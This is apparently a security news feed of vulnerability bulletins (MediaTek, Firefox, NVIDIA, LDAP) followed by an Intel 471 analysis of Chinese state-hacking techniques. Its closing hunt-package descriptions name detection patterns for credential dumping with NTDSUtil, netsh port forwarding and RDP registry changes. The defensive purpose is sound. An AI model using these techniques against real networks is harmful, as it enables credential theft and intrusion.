2025-01-05 Android security bulletin - MediaTek components

3 months ago

Vulnerabilities affecting MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

The user must update the device as soon as possible.

Related vulnerabilities

MediaTek January 2025 Product Security Bulletin (severe vulnerability)

3 months ago

MediaTek has released its January 2025 Product Security Bulletin: https://corp.mediatek.com/product-security-bulletin/January-2025

Out-of-bounds write vulnerabilities in power management (CVE-2024-20140) and the Digital Audio subsystem (CVE-2024-20143, CVE-2024-20144, CVE-2024-20145). These vulnerabilities could lead to local privilege escalation, potentially allowing attackers to gain unauthorized access to sensitive data or system functionalities.

These vulnerabilities could lead to local privilege escalation, potentially allowing attackers to gain unauthorized access to sensitive data or system functionalities.

Other vulnerabilities addressed include issues in the WLAN driver (CVE-2024-20146, CVE-2024-20148) that could lead to remote code execution and an out-of-bounds write vulnerability in the M4U subsystem (CVE-2024-20105) that could allow for local privilege escalation.

MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches. Users are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.

Related vulnerabilities

PoC LDAPNightmare: The CVE Mix-Up (as noted by @wdormann@infosec.exchange)

3 months ago

A PoC for CVE-2024-49113 titled “Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability.” is provided by SafeBreach.

However, there was confusion between CVE-2024-49113 (DoS) and CVE-2024-49112 (RCE - CVSS 9.8), as noted by @wdormann@infosec.exchange:

https://github.com/SafeBreach-Labs/CVE-2024-49113/commit/eb76381b2927ce78c86743267d898b4ebfcbb187

Related vulnerabilities

The Qualcomm DSP Driver - How Serbian authorities have deployed surveillance technology and digital repression tactics

4 months ago

Amnesty International identified how Serbian authorities used Cellebrite to exploit a zero-day vulnerability (a software flaw which is not known to the original software developer and for which a software fix is not available) in Android devices to gain privileged access to an environmental activist’s phone. The vulnerability, identified in collaboration with security researchers at Google Project Zero and Threat Analysis Group, affected millions of Android devices worldwide that use the popular Qualcomm chipsets. An update fixing the security issue was released in the October 2024 Qualcomm Security Bulletin.

Related bundle on Vulnerability-Lookup (Patch for Android).

Investigation from Amnesty International

https://github.com/AmnestyTech/investigations/tree/master/2024-12-16serbianovispy

“A Digital Prison”: Surveillance and the suppression of civil society in Serbia

https://securitylab.amnesty.org/latest/2024/12/a-digital-prison-surveillance-and-the-suppression-of-civil-society-in-serbia/

Related vulnerabilities

Chinese APT Techniques

4 months ago

China’s global ambitions continue to grow, and its military strength, technology research and economic powers are giving it an opportunity to challenge the global order of power — particularly the standing of the U.S. China is expected to soon have the military capabilities to take Taiwan by force. In April 2024, Adm. John Aquilino of the U.S. Indo-Pacific Command cautioned China will be capable of invading Taiwan by 2027. Its building of bases and airstrips on contested reefs in the Spratly Islands near the Philippines continues to cause military tensions. On the technology research side, China has invested an estimated US $15 billion — more than three times that of any other country — in quantum computing and is expected to invest as much as US $1.4 trillion in artificial intelligence (AI) in the next six years. And throughout the world, China uses its economic might — via loans and trade initiatives — to increase its influence in places such as Africa and Pacific Island nations. Fig1

A map of the contested Spratly Islands, a clutch of reefs, shoals and islands in the South China Sea claimed by Brunei, China, Malaysia, Philippines, Taiwan and Vietnam.

Cyber capabilities play a key role in achieving China’s strategic goals, including ensuring partners stay aligned with China and shaping public narratives. This has raised alarms from other governments, which have called for increased vigilance and tightened security. The country’s offensive cyber capabilities have been used for espionage, intellectual property theft and prepositioning of footholds within the critical infrastructure of its adversaries. U.S. intelligence assesses these stealthy malware infections are intended to accomplish disruptive or destructive attacks in the event of a conflict. These campaigns have targeted government and civilian infrastructure at scale. U.S. FBI Director Christopher Wray said China “has a bigger hacking program than every other major nation combined. In fact, if each one of the FBI’s cyber agents and intelligence analysts focused exclusively on the China threat, China’s hackers would still outnumber FBI cyber personnel by at least 50 to 1.”

Espionage traditionally has been shrouded in secrecy, but this is changing. In the past 18 months, governments have disclosed suspected Chinese state-sponsored cyber activities to build public security awareness. The transparency drive correspondingly has driven a change in the advanced persistent threat (APT) landscape. As a result, Chinese state-sponsored cyber threat actors have adapted to global geopolitical developments in 2024 by updating their tactics, techniques and procedures (TTPs) and tool sets to avoid their campaigns being linked to Beijing. Threat actors with a China nexus are emphasizing stealth now more than ever by weaponizing network edge devices, using living off-the-land (LOTL) techniques and setting up operational relay box (ORB) networks.

This post is derived from Intel 471’s Cyber Geopolitical Intelligence, a service that offers insights and analysis of political activity and significant regional events, including China, Iran and Russia, and how those events impact the cyber threat landscape. This post will discuss some of the state sponsored campaigns linked to China and what techniques will likely continue to trend. For more information, please contact Intel 471.

Zero-Day Exploits

Chinese APT groups will move away from traditional initial access methods such as social engineering to exploit zero-day vulnerabilities against network edge devices for mass exploitation. Edge devices and services such as firewalls and virtual private network (VPN) gateways increasingly have become popular targets. These devices are internet facing and provide critical services to remote users, but they also are not easily monitored by network administrators due to the lack of endpoint detection and response (EDR) solutions installed. This provides a “rapid route to privileged local or network credentials on a server with broad access to the internal network” of a target organization, according to research from WithSecure.

Edge-related common vulnerabilities and exposures (CVEs) added to the Known Exploited Vulnerabilities catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased from two per month in 2022 to 4.75 in 2024. Conversely, non-edge entries dropped from 5.36 in 2023 to three in 2024. Additionally, an estimated 85% of known zero-days exploited by Chinese nation-state groups since 2021 were against public-facing appliances, which supports a growing trend that attackers are singling out edge devices for mass exploitation.

The Chinese threat group Volt Typhoon aka Vanguard Panda, Bronze Silhouette, Dev-0391, UNC3236, Voltzite, Insidious Taurus discovered in mid-2021 often relies on exploiting zero-day vulnerabilities. The group targets critical infrastructure, such as communications, energy, transport and utilities, including water and wastewater facilities. The group’s “choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence-gathering activities,” according to a U.S. advisory. Volt Typhoon targets public-facing appliances — routers, VPNs and firewalls — in campaigns the U.S. assesses with high confidence are intended to preposition themselves on devices to disrupt them if needed. The U.S. government announced in January 2024 it had disrupted a botnet assembled by Volt Typhoon and used to attack critical infrastructure. The botnet was assembled using the KV malware, which infected hundreds of small office-home office routers (SOHO) — most of which were out of support and no longer receiving security updates.

Several of the largest cyberattacks in 2023 related to vulnerabilities in edge devices or enterprise appliances. On May 23, 2023, Barracuda disclosed CVE-2023-2868, a zero-day vulnerability in its Email Security Gateway (ESG). As early as Oct. 10, 2022, a threat actor group sent emails to potential victims with malicious files intended to exploit ESG. Mandiant identified the group as UNC4841, a cyber espionage group that acts in support of China.

In early 2021, a group known as Silk Typhoon (under Microsoft’s current threat actor naming scheme) exploited a series of zero-day vulnerabilities, including CVE-2021-26855 in the on-premises version of Microsoft’s Exchange email server. The attack could be launched remotely against an Exchange server on port 443. Tens of thousands of Exchange servers were exploited using the vulnerabilities — collectively known as the ProxyLogon flaws — in the days before Microsoft deployed patches.

How does China source these zero-day vulnerabilities? Increasingly, domestically. Chinese security researchers are talented and prolific. Chinese teams in the 2010s saw success at international Capture the Flag and hacking competitions such as DEF CON and Pwn2Own. But in 2017, Beijing started to pressure private sector security researchers to prevent them from sharing knowledge at overseas cybersecurity events. Authoritative Chinese information security experts also asserted that knowledge of undisclosed software vulnerabilities “should remain in China.” In the ensuing years, the Chinese Communist Party (CCP) incorporated the use of security flaws into its national military-civil fusion strategy that aims to acquire foreign intellectual property, key research and high-value information.

China now uses bug-bounty programs, hacking competitions, universities and private entities to collect information on zero-day vulnerabilities in popular software and products. By mandating that security researchers disclose zero-day vulnerabilities to state authorities first, Beijing provides an operational window for nation-state cyber perpetrators to exploit these vulnerabilities for cyber espionage and intelligence gathering. One example of this arrangement played out in 2022. Microsoft reported an Exchange vulnerability tracked as CVE-2021-42321 that was exploited in the wild three days after the security flaw was revealed at the Tianfu Cup, an annual hacking competition held in Chengdu, Sichuan.

Living Off the Land

Rather than develop highly sophisticated custom malware, nation-state groups increasingly will use LOTL techniques to maintain persistence and undetected access on information technology (IT) networks. LOTL techniques use legitimate tools, features and functions available in a target environment to traverse networks and hide within normal network activity, reducing the likelihood of the attacker’s presence being flagged as suspicious. In 2023, the Chinese APT groups Flax Typhoon aka RedJuliett, Ethereal Panda and Volt Typhoon leveraged legitimate tools and utilities that were built into the Windows operating system to target key sectors in the U.S., Taiwan and elsewhere. Some of the tools they used included wmic, ntdsutil, netsh and PowerShell.

In August 2023, the China-linked cyber espionage group BlackTech used LOTL techniques such as NetCat shells and modifying the victim registry to enable remote desktop protocol (RDP). In July 2024, the Chinese-speaking APT group Ghost Emperor resurfaced after an extended period of inactivity with new obfuscation techniques, including the use of living-off-the-land binaries (LOLBins) such as reg.exe and expand.exe within the batch file that initiated the infection chain on the compromised machine to achieve stealth.

Compromised Infrastructure

Chinese ORB networks will continue to develop and mature at pace, reducing APT groups’ dependency on conventional actor-controlled infrastructure. ORB networks are global infrastructures of virtual private servers (VPSs) and compromised smart devices and routers. The extensive networks of proxy devices allow their administrators to scale up and create a “constantly evolving mesh network” to conceal espionage operations. While ORB networks have existed for years, Chinese ORBs in particular have increased in popularity and sophistication in recent years. Each of China’s ORBs is maintained by either private companies or state-sponsored entities and facilitates multiple threat clusters at any given time.

The Mulberry Typhoon aka APT5, Bronze Fleetwood, Keyhole Panda, Manganese, Poisoned Flight, TABCTENG, TEMP.Bottle and Nylon Typhoon aka ke3chang, APT15, Vixen Panda, Nickel groups used the SPACEHOP network to conduct network reconnaissance scanning and exploit vulnerabilities. The Violet Typhoon aka APT31 group and several other actors with a China nexus used the FLORAHOX ORB network to proxy traffic from a source and relay it through a Tor network and numerous compromised router nodes to obfuscate the source of the traffic for cyber espionage attacks.

Assessment

Global geopolitical developments will continue to heavily influence the Chinese APT threat landscape in terms of targeting, tool sets and TTPs. The acceleration of improvements in the cybersecurity posture of numerous key targeted countries has compelled Chinese state-sponsored intelligence forces to become more innovative with their attack strategies.

The use of ORB networks and exploitation of network edge devices emphasize the scalability of their attacks, and all three techniques focus on secrecy. Adopting these techniques would have required a cumulation of upgraded skills, malware and tools that could only be achieved by continuous reconnaissance of target networks and technologies as well as meticulous testing of tools against them over extended periods. Therefore, these changes highly likely reflect a considered, fundamental and permanent shift in Chinese nation-state cyber operations.

In the next six to 12 months, governments and industry regulators worldwide will increase oversight of vital sectors such as energy, public administration, military and defense, technology, manufacturing, telecommunications and media, health care and financial services. Not only will Chinese nation-state threat actors almost certainly continue to pursue these high-value targets, it also is probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible to maximize their gains at every exploitation.

Hunt Packages

Intel 471 provides threat hunting capabilities for Chinese APT activity through our threat hunting platform HUNTER471. The following is a non-exhaustive list of hunt packages we have created related to the tactics used by Chinese nation-state threat actors.

These pre-written threat hunt queries can be used to query logs stored in security information and event management (SIEM) or EDR systems to detect potential malicious activity. The queries are compatible with a variety of security tools and products, such as CarbonBlack Cloud - Investigate, CarbonBlack Response, CrowdStrike, CrowdStrike LogScale, Elastic, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, Splunk and Trend Micro Vision One. Register for the Community Edition of HUNTER471, which contains sample hunt packages at no cost. Fig2 A screenshot of hunt packages available in HUNTER471 related to finding behaviors associated with the threat actor group Volt Typhoon.

WMIC Windows Internal Discovery and Enumeration

This package will identify the potential malicious use of Windows Management Interface (WMI) for local enumeration and discovery of a host.

Obfuscated PowerShell Execution String - Potential Malware Execution

Many adversaries use obfuscated commands involving different techniques to implement and use Base64 strings. This package identifies popular characteristics deployed by many actors utilizing this technique.

Enabling Remote Desktop Protocol (RDP) - Possible SmokedHam Activity (Commandline Arguments)

This content is designed to detect when command-line arguments are executed to modify the registry key that enables or disables RDP capabilities (HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server OR HKLM\SYSTEM\ControlSet00*\Control\Terminal Server). False positives may occur depending on the environment per company, as these registry keys can be modified by admins.

Dump Active Directory Database with NTDSUtil - Potential Credential Dumping

This content is designed to identify when NTDSutil.exe is used to create a full backup of Active Directory.

Netsh Port Forwarding Command

This use case is meant to identify the netsh port forwarding command-line parameters "interface portproxy add."

Restricted Admin Mode Login - Possible Lateral Movement

This hunt package is meant to capture the surrounding activity when a user successfully logs in (Event Code 4624) using RDP with restricted admin mode enabled.

Related vulnerabilities

Security Vulnerabilities fixed in Firefox 132

6 months ago

Mozilla Foundation Security Advisory 2024-55 Security Vulnerabilities fixed in Firefox 132

Security Advisory: https://www.mozilla.org/en-US/security/advisories/mfsa2024-55/

• CVE-2024-10458: Permission leak via embed or object elements
• CVE-2024-10459: Use-after-free in layout with accessibility
• CVE-2024-10460: Confusing display of origin for external protocol handler prompt
• CVE-2024-10461: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response
• CVE-2024-10462: Origin of permission prompt could be spoofed by long URL
• CVE-2024-10463: Cross origin video frame leak
• CVE-2024-10468: Race conditions in IndexedDB
• CVE-2024-10464: History interface could have been used to cause a Denial of Service condition in the browser
• CVE-2024-10465: Clipboard "paste" button persisted across tabs
• CVE-2024-10466: DOM push subscription message could hang Firefox
• CVE-2024-10467: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4

Related vulnerabilities

NVIDIA GPU Display Driver

6 months ago

NVIDIA has released a software security update for NVIDIA GPU Display Driver to address various issues.

CVE‑2024‑0126 - "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability which could allow a privileged attacker to escalate permissions. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering."

Related vulnerabilities

Security Vulnerability fixed in Firefox 131.0.2, Firefox ESR 128.3.1, Firefox ESR 115.16.1

6 months ago

The vulnerability, tracked as CVE-2024-9680, and discovered by ESET researcher Damien Schaeffer, is a use-after-free in Animation timelines.

"An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild."

A patch has been made available on Tue, 08 Oct 2024 16:25:12 +0000.

Related vulnerabilities